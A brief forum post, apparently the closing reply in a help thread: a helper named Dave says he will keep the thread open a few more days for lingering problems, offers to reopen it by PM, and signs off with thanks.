I'll leave this thread open for a couple days in case you come across any lingering problems that need fixing, then I'll close it up. If you need it reopened for any reason just shoot me a PM. It's been a pleasure working with you, now best of luck!

Cheers,
Dave